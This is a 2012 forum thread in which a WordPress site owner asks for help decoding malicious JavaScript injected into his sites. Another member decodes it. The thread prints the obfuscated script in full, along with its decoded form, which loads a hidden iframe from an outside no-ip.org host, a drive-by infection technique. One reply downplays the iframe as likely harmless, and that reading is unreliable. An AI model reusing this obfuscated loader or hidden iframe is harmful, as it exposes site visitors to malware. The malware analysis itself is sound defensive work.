1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

WP Site Injected - Can Anyone Decipher Code for Me?

Discussion in 'BlackHat Lounge' started by nam6641, Feb 29, 2012.

  1. nam6641

    nam6641 Supreme Member

    Joined:
    Nov 15, 2008
    Messages:
    1,476
    Likes Received:
    914
    Location:
    East Coast
    Had Base64_Decode injected in some of my Wordpress sites.

    Can anyone tell me what this is doing so I can try to track down who I need to f#ck up?

    Code:
    <script>if(window.document)try{new location(12);}catch(qqq){aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';s=String;f='fro'+'m'+'C'+'h'+'ar';f+='Code';}ee='e';e=window.eval;t='y';}h=-2*Math.log(Math.E);n="3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a19.5a60.5a3.5a3.5a3.5a51.5a50a56a47.5a53.5a49.5a56a19a19.5a28.5a3.5a3.5a61.5a15a49.5a53a56.5a49.5a15a60.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a58.5a56a51.5a57a49.5a19a16a29a51.5a50a56a47.5a53.5a49.5a15a56.5a56a48.5a29.5a18.5a51a57a57a55a28a22.5a22.5a52.5a51.5a49a23a25.5a26.5a27a25a22a54a54.5a21.5a51.5a55a22a54.5a56a50.5a22.5a30.5a50.5a54.5a29.5a24a18.5a15a58.5a51.5a49a57a51a29.5a18.5a23.5a23a18.5a15a51a49.5a51.5a50.5a51a57a29.5a18.5a23.5a23a18.5a15a56.5a57a59.5a53a49.5a29.5a18.5a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a28a51a51.5a49a49a49.5a54a28.5a55a54.5a56.5a51.5a57a51.5a54.5a54a28a47.5a48a56.5a54.5a53a57.5a57a49.5a28.5a53a49.5a50a57a28a23a28.5a57a54.5a55a28a23a28.5a18.5a30a29a22.5a51.5a50a56a47.5a53.5a49.5a30a16a19.5a28.5a3.5a3.5a61.5a3.5a3.5a50a57.5a54a48.5a57a51.5a54.5a54a15a51.5a50a56a47.5a53.5a49.5a56a19a19.5a60.5a3.5a3.5a3.5a58a47.5a56a15a50a15a29.5a15a49a54.5a48.5a57.5a53.5a49.5a54a57a22a48.5a56a49.5a47.5a57a49.5a33.5a53a49.5a53.5a49.5a54a57a19a18.5a51.5a50a56a47.5a53.5a49.5a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a56.5a56a48.5a18.5a21a18.5a51a57a57a55a28a22.5a22.5a52.5a51.5a49a23a25.5a26.5a27a25a22a54a54.5a21.5a51.5a55a22a54.5a56a50.5a22.5a30.5a50.5a54.5a29.5a24a18.5a19.5a28.5a50a22a56.5a57a59.5a53a49.5a22a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a29.5a18.5a51a51.5a49a49a49.5a54a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a55a54.5a56.5a51.5a57a51.5a54.5a54a29.5a18.5a47.5a48a56.5a54.5a53a57.5a57a49.5a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a53a49.5a50a57a29.5a18.5a23a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a57a54.5a55a29.5a18.5a23a18.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a58.5a51.5a49a57a51a18.5a21a18.5a23.5a23a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a51a49.5a51.5a50.5a51a57a18.5a21a18.5a23.5a23a18.5a19.5a28.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a22a47.5a55a55a49.5a54a49a32.5a51a51.5a53a49a19a50a19.5a28.5a3.5a3.5a61.5".split("a");for(i=0;0>i-n.length;i++){j=i;ss=ss+s[f](-h*(1+1*n[j]));}if(1)q=ss;if(f)e(q);</script>
     
  2. sockpuppet

    sockpuppet Junior Member

    Joined:
    Nov 7, 2011
    Messages:
    155
    Likes Received:
    145
    this is going to be executed:
    Code:
    if (document.getElementsByTagName('body')[0]) {
        iframer();
    } else {
        document.write("<iframe src='http://kid05784.no-ip.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    }
    function iframer() {
        var f = document.createElement('iframe');
        f.setAttribute('src', 'http://kid05784.no-ip.org/?go=2');
        f.style.visibility = 'hidden';
        f.style.position = 'absolute';
        f.style.left = '0';
        f.style.top = '0';
        f.setAttribute('width', '10');
        f.setAttribute('height', '10');
        document.getElementsByTagName('body')[0].appendChild(f);
    }
    
     
    • Thanks Thanks x 1
  3. TrevorB

    TrevorB Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 21, 2011
    Messages:
    1,185
    Likes Received:
    361
    Location:
    Canada
  4. nam6641

    nam6641 Supreme Member

    Joined:
    Nov 15, 2008
    Messages:
    1,476
    Likes Received:
    914
    Location:
    East Coast
    some of my minisites from a year ago did not have the latest WP version installed, so i'm guessing they was a hole in previous version that they exploited.
     
  5. white92

    white92 Regular Member

    Joined:
    Nov 22, 2009
    Messages:
    310
    Likes Received:
    89
    Occupation:
    Student
    Location:
    Portugal
    Hi,

    Can you share your wp version?
     
  6. nam6641

    nam6641 Supreme Member

    Joined:
    Nov 15, 2008
    Messages:
    1,476
    Likes Received:
    914
    Location:
    East Coast
    Thanks for this. Of course it turns out to be a free hosting account, so they are looking into and ideally will shut down. Any idea what action is being executed by this?

     
  7. thsaint

    thsaint Newbie

    Joined:
    Jul 4, 2011
    Messages:
    15
    Likes Received:
    0
    I have the same codes on my wordpress sites. It keeps on popping up even i delete it.How do i get rid of it ?
     
  8. kvmcable

    kvmcable Supreme Member

    Joined:
    Dec 28, 2010
    Messages:
    1,355
    Likes Received:
    2,815
    Occupation:
    24 year business owner - old school dude
    Location:
    KFC - BW3
    Looks like an iframe code. Shows a page in a page. Not working now because someone took down that link. So currently it's not showing what it was meant to show. Most likely an affiliate page or some joke, porn or signature page. Hard to say now that the url is dead that was called in the frame.